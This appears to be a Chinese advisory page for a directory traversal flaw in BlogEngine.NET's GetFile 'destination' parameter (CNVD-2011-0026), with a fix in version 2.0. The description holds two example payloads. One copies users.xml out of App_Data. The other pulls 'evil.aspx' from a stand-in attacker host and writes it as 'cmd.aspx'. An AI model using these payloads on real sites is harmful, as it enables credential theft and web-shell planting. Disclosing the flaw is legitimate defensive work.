BlogEngine.NET GETFILE函数的"destination"参数存在目录遍历漏洞(CNVD-2011-0026)

admin 2023-12-26 11:52:36 Ali_nonvd 来源:ZONE.CI 全球网 0 阅读模式
BlogEngine.NET GETFILE函数的"destination"参数存在目录遍历漏洞(CNVD-2011-0026)

CVE编号

N/A

利用情况

暂无

补丁情况

N/A

披露时间

2011-01-06
漏洞描述
BlogEngine.NET是一款开源博客系统。GETFILE函数的"destination"参数存在目录遍历攻击,使用/../../序列可把文件上传到App_Data/files之外的位置。<GetFile xmlns="http://dotnetblogengine.net/"><source>c:\webroot\blog\App_Data\users.xml</source><destination>../../aa.txt</destination></GetFile><GetFile xmlns="http://dotnetblogengine.net/"><source>http://attacker/evil.aspx</source><destination>/../../cmd.aspx</destination></GetFile>
解决建议
BlogEngine.NET 2.0已经修复此漏洞,建议用户下载使用:http://www.dotnetblogengine.net/
参考链接
https://www.cnvd.org.cn/flaw/show/CNVD-2011-0026
CVSS3评分 N/A
  • 攻击路径 N/A
  • 攻击复杂度 N/A
  • 权限要求 N/A
  • 影响范围 N/A
  • 用户交互 N/A
  • 可用性 N/A
  • 保密性 N/A
  • 完整性 N/A
N/A
CWE-ID 漏洞类型
- avd.aliyun.com
weinxin
版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!
评论:0   参与:  0